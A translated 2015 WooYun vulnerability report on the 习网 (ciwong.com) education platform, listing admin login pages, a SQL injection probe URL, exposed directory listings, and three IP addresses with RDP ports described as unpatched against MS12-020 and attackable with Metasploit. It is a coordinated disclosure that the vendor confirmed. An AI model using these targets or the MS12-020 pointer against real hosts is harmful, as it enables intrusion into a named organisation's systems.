
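Vulnerability summary

Bug ID: wooyun-2015-092370

Title: 习网 issues, compiled and bundled

Vendor: 习网

Author: 爱上平顶山

Submitted: 2015-01-17 21:11

Fixed: 2015-03-03 21:12

Disclosed: 2015-03-03 21:12

Vulnerability type: Content security

Severity: High

Self-assessed Rank: 16

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]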


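Vulnerability details

Disclosure status:

2015-01-17: Details reported to the vendor; awaiting vendor handling
2015-01-19: Vendor confirmed; details disclosed to the vendor only
2015-01-29: Details disclosed to core white hats and experts in related fields
2015-02-08: Details disclosed to regular white hats
2015-02-18: Details disclosed to intern white hats
2015-03-03: Details disclosed to the public

Brief description:

...

Detailed description:

A roundup of some issues with 习网.
1. Admin back ends:
Found via Google and Bing searches.
Back ends: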
http://jxhd.ciwong.com/
http://bbs.ciwong.com/login.aspx
http://super.admin.ciwong.com/Admin/Login
http://mail.ciwong.com/index.php
http://gwy2013.ciwong.com/lead/Login
http://anquan.ciwong.com/Account/Login/
http://e.ciwong.com/login/indexbefore
http://e.ciwong.com/login/
http://admin.eschool.ciwong.com/users/login
http://admin.ciwong.net/Permission/Login/Login
http://demo.ciwong.com/ (cloud platform)
Combine that with this:


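Combined with these account passwords, judge for yourselves what the impact would be.
2.
http://game.ciwong.com/game/Play/1315'

[Screenshot: 0.jpg]


There are many like this under game.ciwong.com.
3. BBS
http://bbs.ciwong.com/ReadMe.txt, plus some directory listings; check for yourselves
http://www.6v68.com/Areas/ (directory listing)
http://www.6v68.com/admin/
http://113.106.50.4:81/admin/

[Screenshot: 0.jpg]


4.
MS12-020 blue-screen vulnerability; the patch has not been applied
rdp://121.14.117.223:6543
rdp://121.14.117.26:6543
rdp://113.106.50.9:6543
Can be attacked directly with Metasploit; I did not test it.
OK, that's all.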

Proof of vulnerability:

···

Fix:

Fix it.

Copyright notice: when reposting, please credit the source: 爱上平顶山@乌云


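Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-01-19 15:19

Vendor reply:

Fix in progress...

Latest status:

None


Vulnerability comments:

Comments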

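  1. 2015-03-02 20:34 | Forever80s (Regular white hat | Rank: 820, vulnerabilities: 110)

    Did the OP scan for system vulnerabilities too?

  2. 2015-03-02 20:46 | 爱上平顶山, verified white hat (Core white hat | Rank: 2738, vulnerabilities: 547 | [No hat] A traveler far from home. Formerly worked at a certain agency of the Celestial Empire. IT...)

    @Forever80s Just in passing, brother. I think highly of you, brother~

  3. 2015-03-02 22:38 | Forever80s (Regular white hat | Rank: 820, vulnerabilities: 110)

    @爱上平顶山 Thanks a lot! Brother feng, I've been quietly following you for a long time, haha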